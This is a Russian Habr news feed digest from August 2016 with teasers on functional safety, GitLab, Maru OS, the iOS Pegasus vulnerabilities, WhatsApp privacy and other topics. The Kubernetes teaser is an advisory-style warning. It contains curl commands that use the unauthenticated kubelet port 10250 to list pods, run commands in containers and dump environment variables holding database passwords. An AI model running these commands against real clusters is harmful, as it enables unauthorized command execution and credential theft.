Функциональная безопасность – старшая сестра информационной безопасности

image

Безопасности на хабре посвящен целый хаб, и, пожалуй, никто особенно не задумывается, что именно вкладывается в понятие «безопасность», и так все ясно: информационная безопасность (security). Однако, есть еще и другая сторона безопасности, safety, связанная с рисками для здоровья и жизни людей, а также окружающей среды. Поскольку информационные технологии сами по себе опасности не представляют, то обычно говорят о функциональной составляющей, то есть о безопасности, связанной с правильным функционированием компьютерной системы. Если информационная безопасность стала критична с появлением интернета, то функциональная безопасность рассматривалась и до появления цифрового управления, ведь аварии происходили всегда. Информационной безопасности АСУ ТП посвящено немало статей на хабре. Функциональной безопасности авторы тоже касались, как в хабе по SCADA, так и в хабе по промышленному программированию АСУ ТП, но, как мне показалось, несколько вскользь. Поэтому я предлагаю короткую информацию об этом важном свойстве, от которого напрямую зависит, получит ли SkyNET контроль над человечеством.
В статье сделаны некоторые обобщения для АСУ ТП, а также для встроенных и кибер-физических систем.
08/26/2016 20:14:55
0

[Перевод] GitLab 8.11: канбан-доска и разрешение конфликтов одним кликом

Эта статья — перевод релизной статьи компании GitLab. Релизы выходят каждый месяц 22 числа.


Если вы пропустили предыдущие, вот ссылки: 8.10, 8.9, 8.8




В новом GitLab 8.11 столько всего интересного, что мы с трудом сдерживаем себя в рамках конструктивного повествования!


Итак, в новой версии появились:


  • принципиально новый новый способ представления и работы с тикетами (issues);
  • слеш-команды (/command) для работы с тикетами;
  • возможность создавать шаблоны тикетов (в неограниченном количестве);
  • онлайн-среда разработки;
  • возможность разрешать конфликты мержа не выходя из GitLab;
  • настройка прав на пуш в ветку для отдельных участников и групп (только в ЕЕ);
  • … и много других фич, о которых мы тоже расскажем.
08/26/2016 19:45:31
0

Первый открытый выпуск Maru OS

Завершено открытие исходных текстов проекта Maru OS и подготовлен первый открытый релиз Maru OS 0.2.4. Выпуск 0.2.4 полностью аналогичен ранее представленному релизу 0.2.3, за исключением того, что он опубликован в исходных текстах. Наработки проекта открыты под лицензией Apache 2.0. Готовые сборки сформированы для смартфона Nexus 5. Ведётся работа по портированию для других устройств Nexus, а также для некоторых моделей смартфонов LG и Motorola.
08/26/2016 19:31:35
0

Предостережение для пользователей Kubernetes

Сервис kubelet, с которым тесно общается apiserver, слушает порт 10250. Этот порт хоть и использует сертификаты, но лишь для шифрования канала, никакой авторизации на нём нет.


Об этой проблеме известно давно, но почему-то никто не считает её серьезной. Ссылки на обсуждения:



Что с этим можно сделать? Правтически всё. Без регистрации и sms.


Получить список всех pod'ов:


$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

Выполнить команду внутри контейнера? Запросто:


$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

Получить пароль на базу данных? Проще простого:


$ curl -k -XPOST "https://k8s-node-1:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'

Вытащить из неё данные тоже не составит труда.

08/26/2016 19:22:17
0

На каких основаниях Alphabet претендует на членство в «клубе четырех запятых»



Alphabet возник чуть более года назад, в результате реструктуризации Google. Все акции Google были полностью конвертированы в акции Alphabet без каких-либо изменений их параметров. Холдинг Alphabet стал новым игроком на рынке, в состав которого на правах дочек вошли сама Google и все ее предыдущие проекты – в частности Calico, Fiber, Google Ventures, Google Capital, Google X, Life Sciences и Nest. Это, по мнению представителей компании, должно было обеспечить их большую самостоятельность и более четкую структуру руководства.

В ведении Google останется поисковая система, а также карты, рекламный бизнес, сервис Google Play Store, видеохостинг YouTube и разработка операционной системы Android, а также Chrome, Google Apps и социальная сеть Google+.

Пока большинство наиболее прибыльных подразделений всё ещё принадлежат Google. Далеко не все проекты, которыми теперь управляет Alphabet, показывают удовлетворительные результаты.
08/26/2016 19:22:15
0

[Из песочницы] Алгоритм Левенберга — Марквардта для нелинейного метода наименьших квадратов и его реализация на Python



Нахождение экстремума (минимума или максимума) целевой функции является важной задачей в математике и её приложениях (в частности, в машинном обучении есть задача curve-fitting). Наверняка каждый слышал о методе наискорейшего спуска (МНС) и методе Ньютона (МН). К сожалению, эти методы имеют ряд существенных недостатков, в частности — метод наискорейшего спуска может очень долго сходиться в конце оптимизации, а метод Ньютона требует вычисления вторых производных, для чего требуется очень много вычислений.

Для устранения недостатков, как это часто бывает, нужно глубже погрузиться в предметную область и добавить ограничения на входные данные. В частности: МНС и МН имеют дело с произвольными функциями. В статистике и машинном обучении часто приходится иметь дело с методом наименьших квадратов(МНК). Этот метод минимизирует сумму квадрата ошибок, т.е. целевая функция представляется в виде:


Алгоритм Левенберга — Марквардта используется для решения нелинейного метода наименьших квадратов. Статья содержит:

  • объяснение алгоритма
  • объяснение методов: наискорейшего спуска, Ньтона, Гаусса-Ньютона
  • приведена реализация на Python с исходниками на github
  • сравнение методов

08/26/2016 19:16:02
0

Хобби-проекты: lets-meet.ru — куда пойдем в пятницу


Автор: Артем Трубачев

Идея создания этого приложения родилась, когда мы с коллегами в очередной раз собирались пойти в бар, но никак не могли договориться о дате. Все мы люди взрослые, и свободного времени у нас, конечно, мало. lets-meet.ru создан как раз чтобы определить, когда всем будет удобнее собраться.

В двух словах, это работает так: вы создаете встречу и указываете варианты даты, время и места. Также можно добавить дополнительные вопросы.
08/26/2016 19:05:37
0

Security Week 34: уязвимость в iOS, Powershell-троян, коллизии против 3DES и Blowfish

Уязвимости в iOS — это определенно главная новость недели. Вчера компания Apple выпустила срочный апдейт для своих мобильных устройств, и в этот раз, пожалуй, действительно надо быстрее обновиться. Уязвимость была обнаружена лабораторией Citizen Lab в Университете Торонто и компанией Lookout. На сайте Citizen Lab опубликован подробный отчет, и пожалуй именно он делает событие особенно важным, так как дает важный контекст о том, как дыра эксплуатировалась до обнаружения. Это не так уж часто происходит.

Уязвимости CVE-2016-4655 и 4656 затрагивают ядро iOS: если первая может обеспечить утечку данных, то эксплуатация второй приводит к выполнению произвольного кода. Еще одна уязвимость (CVE-2016-4657, хотя в отчете Lookout порядок нумерации другой) обнаружена в компоненте WebKit и также приводит к выполнению произвольного кода при посещении зараженного вебсайта. Все три уязвимости используются комплексно: сначала заражение через веб-сайт, потом джейлбрейк устройства, причем с использованием публично доступных джейлбрейк-компонентов (Cydia).

Расследование, закончившееся обнаружением уязвимостей, началось с подозрительных SMS со ссылками, которые гражданский активист Ахмед Мансур переслал в Citizen Lab. По клику на ссылку на телефон скрытно устанавливался шпионский модуль, который блокировал обновления устройства, и собирал данные из популярных мессенджеров, программ для общения в соцсетях и так далее. По мнению представителя Lookout, эта дыра могла использоваться начиная с 2013 года и версии iOS 7. Кроме того, в истории есть и политический подтекст: в Citizen Lab утверждают, что данный образец кибероружия был разработан одной из компаний, специализирующейся на продаже подобных систем государственным и правоохранительным органам. Впрочем с выпуском патчей информация об эксплойтах и методах атаки может начать использоваться более широко, посему повторюсь — стоит обновиться прямо сейчас.
08/26/2016 18:49:21
0

[recovery mode] Цензура и рассмотрение правительством игр в Китае

Собственно, многие, кто следит за ИТ-новостями, слышали о том, что с 2016 года в Китае для выпуска игры необходимо одобрение от правительственного органа. Так как я более-менее в теме, хочу об этом рассказать подробнее.

Так вот китайский портал ahgame.com иронизирует на эту тему. 行政审批 — рассмотрено правительством.
08/26/2016 18:34:59
0

Тёмные паттерны в действии. WhatsApp объяснил, как отказаться от передачи персональной информации в Facebook



Вчера компания WhatsApp объявила о внесении изменений в два документа — Условия предоставления услуг (Terms Of Service) и Политику конфиденциальности (Privacy Policy).

Текст документов на русском языке

Изменения в эти документы вносят впервые за четыре года. Как несложно догадаться, изменения связаны с тем фактом, что в 2014 году компания WhatsApp перешла в собственность корпорации Facebook. Пришло время окупить потраченные деньги, то есть слить новому владельцу информацию о своих пользователях.
08/26/2016 18:33:10
0